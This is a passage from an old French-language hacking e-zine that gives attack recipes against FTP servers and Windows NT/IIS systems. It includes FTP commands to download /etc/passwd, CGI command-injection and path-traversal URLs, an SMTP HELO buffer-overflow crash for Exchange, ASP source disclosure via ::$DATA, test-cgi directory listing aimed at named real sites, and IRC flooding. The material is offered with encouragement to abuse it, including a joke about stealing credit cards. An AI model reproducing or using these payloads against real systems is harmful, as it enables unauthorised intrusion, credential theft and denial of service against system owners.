QUOTE cwd ~root

*Please login with user and pass before

Ensuite tapez:

QUOTE pass ftp

*You're logged in:
ftp>

Voila, vous tes connect, maintenant, il
ne vous reste qu' aller chercher le password 
file en tappant exemple (passwd est dans /etc):

get etc/passwd

Et voil, vous avez la liste de tous les 
logins et passwords, amusez-vous...

                                  {Sliver}

************************************************************
=-=-=-=-=-=-=-=- 11. Hacker son windows NT -=-=-=-=-=-=-=-=-
************************************************************

***************************
**                       **
** Hacker son windows NT **
**                       **
**            (c) putois **
***************************

Well, encore une doc, et oui encore une, qui
va essayer d'expliquer comment hacker un windows NT
sans cette affreux NBTSTAT, que l'on retrouve 
partout et  force ca devient lassant.

Note sur nbtstat:
-----------------
Il est dit nul part que pour mener  bien cette 
mission il faut executer la commande CMD sous le 
shell de NT, pour pouvoir se servir du Net View.

On peut videmment tapper net start pour lancer les 
services du netbios etc.. De plus le nbtstat est 
utiliser sur les ports: 137, 138, 139.

Windows NT en local:
--------------------
Pour le cas que vous tes stagiaire, et que vous 
avez votre login sur une partie du rseau du centre,

1. Ya qu'a savoir si ils ont accs sur le web, et 
   d'essayer si ca marche en telnet ya qu'a se brancher 
   avec son compte.
2. Ya qu'a regarder dans \windows\profiles\ si ya pas 
   les noms d'utilisateurs dans les repertoires, si oui 
   placez-vous dans un repertoire et faites exit. La machine 
   redemarre le bureau sous le nom d'utilisateur choisi.
3. Pour cracker les pwl ya qu'a se dmerder et chercher un
   programme au nom de GLIDE prvu  cet effet.

Sniffing:
---------
Mthode qui consiste  envoyer des paquets pour tracer un 
serveur. Exemple tracert ip, ou faite un tracert sur le 
cisco de la machine sur le port 11 et le systat donne toute 
les ip local.

Notes: Cisco = routeur.

Logiciel dispo: tout les portpro, portscan etc, et un autre 
au nom de ETHERPEEK (trs bien celui-l y fait comme un linux ;))

Go to the Web:
--------------
La Methode IIS -> Internet Information Server

IIS v1.0:
---------
C'est pour le cas ou le directory des CGI s'appelle script soit par 
www.toto.com/cgi ou www.toto.com/script, cette mthode consiste  
lister le directory du server et permet d'executer des commandes 
avec CMD.exe:

 /scripts/toto.bat?&dir+c:\+?&time
 /scripts/toto.cmd?&dir+c:\+?&time

Il existe sur les versions NT 3.0 et inferieur ou sur le tres grand 
rseau d'une universit ou toute autre grosse merde militaire etc.

Et si ca marche? (oh joie!) Ben votre navigateur affiche le 
directory comme quand on mets c:\ dans le location, ou alors ca 
demande si on veut sauvegarder dans le blocnote.exe, et bien sur 
ca start une command dowload.

The syntax: /scripts/toto.bat?&COMMAND1+?&COMMAND2
----------
ISS Win NT 4.0
--------------

Crash Server: Marche en telnet sur le port 80 de l'ip distante
commande: GET ../ .. , et appuyez sur <ENTER>, ca marche sur 
tout ce qui est Proxy server. Ou autre merde genre moteur de 
recherche comme yahoo ,ya qu'a aller sur /cgi-bin/.. et si ca 
vous donne une erreur avec Content-type vous avez des chances!

Note: Pensez  respecter les espaces.

ISS Loopback:
------------

Fonctionne avec le ism.dll qui gre les passwords.

The syntax: /scripts/iisadmin/ism.dll?http/dir ou /_vti_bin/

Root directory et download: NT 4.0, IIS 1.0
---------------------------

Toujours du meme principe que le get ../ mais par le web cette fois qui 
permet d'avoir le c:\

http://www.domain.com/..\.. ou http://www.domain.com/scripts..\..\scriptname

Bat create: Win NT 4.0
-----------

/scripts/exploit.bat>PATH\target.bat

Crash Port 25: Microsoft Exchange Internet Mail Service  
-------------

Buffer overflow pour la version 5.5. 

1. faire un telnet sur le port 25 de l'ip distance et tapez helo aaaaaaaaaaa
   aaaaaaaaaaaaaaaaaaaaaaaaa etc pendant deux page et ...

2. helo blah.net . MAIL FROM: aaaaaaaaaaaaaaaaaaa etc

* Dis dans rootshell et bugtraq

250 mhs.jpl.nasa.gov G'day [194.xx.xx.xx]!  Why do you call yourself aaa? ;-)

Les fichiers ASP:
----------------

Default.asp: Telnet 80  IIS/4.0
-----------

GET /default.asp?cid=[*]&v=3086&pw=8F4272A6Fc6FDFDFAAD3B435B51404EE

Buffer overflow qui donne le password crypt: 8F4272A6Fc6FDFDFAAD3B435B51404EE

Asp source viewver:
-------------------

index.asp::$DATA  pour voir le source du asp 

Flooding:
---------
C'est le fait d'envoyer quelques centaines de mots pour dconnecter
une machine. Sur IRC tu prends dcc fuck tu va sur ircnet et t'envoie 
des /who *.jp hehe.

NT SYN:  Win NT 3.51, 4.0
-------
netstat -n -p tcp

NETCAT:
------

Bug plus connu sur les unix, beos, linux, etc permet de faire des ls par le 
port 80 avec un *.Exemple:www.navi.mil/cgi-bin/test-cgi * pour lister le
contenu du /cgi-bin/ , test-cgi /* pour lister le directory,
www.navy.mil/cgi-bin/test-cgi/ /*etc/* si tu veux te placer dans /etc,
www.navy.mil/cgi-bin/test-cgi /*/passwd pour une recherche de fichier.

Notes: Run only avec les netscape 3 et pas avec netscape 4 ie4 etc, moi j'ai
netscape 3us, ou trouver? go to www.filez.com et tape N16E comme mot clef

Mygale.org hacked on 97/98 by test-cgi le but etait simple yavais juste a
aller dans la cration de compte et de taper password * et sa donnais la 
liste des users.Le meme effet s'est produit sur angelfire.com, meme principe
et chez.com. Enfin bref si vous avez un server de commande avec test-cgi vous
pouvez mettre toujours credit-cards * lol

Notes: un petit mot pour le netcat |nc removed.com , pour le telecharger,
aller sur: http://www.l0pht.com/users/10pht/nc11nt.zip d'apres eux on 
pourrait meme faire un cp et un mv ce qui pourrait etre interressant si on
pouvais deplacer un file vers une ip.


-----  *   *   ----
  -    *****   --
  -    *****   --
  -    *   *   ----     ENdS.      (c) putois


************************************************************
=-=-=-=-=-=-= 12. Hacker son windows NT #2 -=-=-=-=-=-=-=-=-
************************************************************

*****************************
**                         **
** Hacker son windows NT 2 **
**                         **
**              (c) putois **
*****************************

Bienvenu dans HackNT Numro 2, celui-ci est ddi  voir 
comment fonctionne cet affreux nbtstat, sans le pratiquer 
mais voir comment marche cette faille, ce qui peut tre 
toujours interressant.

Travaux Pratique:  Fait avec NT4 fr
-----------------

Dans le premier numro de hackNT on a vu que le nbtstat 
fonctionnais sur les serveurs ou les ports 137,138,139 
(service du netbios, tcp et udp).

Comment crer sois meme la faille afin de pouvoir s'exercer sur son nt?
-----------------------------------------------------------------------

1. D'abord il faut crer un rpertoire dans la racine du disque c:\ (ex:toto)

2. Ensuite, activez votre explorateur windows, placez-vous sur le repertoire
   toto, (1 seul clic), appuyez sur le bouton droit de la souris et choisissez
   l'option "PARTAGER", vous avez la une fentre qui apparait permettant de 
   dfinir les droits d'accs sur le repertoire. Cliquez sur "partager en tant 
   que" et choisissez par exemple lire, faites OK, puis Appliquer, et OK pour 
   quitter. A ce moment la une main bleue apparait dans l'explorateur qui 
   signifie que toto a bien t partag.

Pour voir si l'opration s'est bien sous le shell de Ms-Dos tapez NET SHARE
pour donner les nom de partage local. Exemple pour ma machine:

Nom partage    Ressource         Remarque
---------------------------------------------------
IPC$                     	 IPC distant
c$		c:\	         Partage par defaut
ADMIN$		c:\winnt         Admin. distante
toto		c:\toto

Voila toto est maintenant le bug de nbtstat et on peut le retrouver dans la
liste du rsultat avec l'option "recherche d'ordinateur".

Pour rajouter des remarque,toujours avec notre commande net share,tapez:

net share toto /remark:"toto"     

puis appuyez sur Enter et on a un gentil message qui s'affiche:

"La commande a t execute." 
Et quand l'on retape net share on a bien toto dans les remarques.

Nom partage    Ressource           Remarque
---------------------------------------------------
toto		c:\toto		    toto

Pour supprimer le partage faite:

net share toto /DELETE . Toto est donc enleve de la liste des partages.

Net view:
---------
Pour se servir de cette commande sous windows NT, il faut d'abord tapper
CMD sous le shell. Et sous 95..? Cannot run with msdos command ?? Ya qu'a
aller dos4gw ou dwsdpmi je sais plus.
Donc, aprs avoir taper CMD, celui-ci redemarre le shell de NT. Le role 
de CMD et de pouvoir visualiser les ressources partages, sxemple:

net view \\corruption

Nom     Type     Local  Remarque
--------------------------------
toto   Disque
La commande a ete execute.  

Note: corruption est le nom de mon disque donne au formatage 
(pour les newbies).

Pour lister le contenu de toto: dir \\corruption\toto

(c) putois
 
************************************************************
=-=-=-=-=-=-=-=-=-=-=- 13. Fin du #3 =-=-=-=-=-=-=-=-=-=-=-=
************************************************************

  (`..)  
  |      ____|   /\
   | ?   / _ \
      |oo    * |_| * 
      | ?  |  _  |
  ____|____oo| |_| |_______
  |??L_|L_|
      | ??
      |          By |{night

Bon et bien, merci  de  nous avoir lu,  et j'espre que vous
avez appris quelquechose.  Si vous avez  des commentaires ou
des suggestions ils sont les bienvenues : tsarmy@hotmail.com
Je voudrais  encore  remercier putois pour  sa collaboration
dans ce e-zine.

[--------------------------- EOF --------------------------]

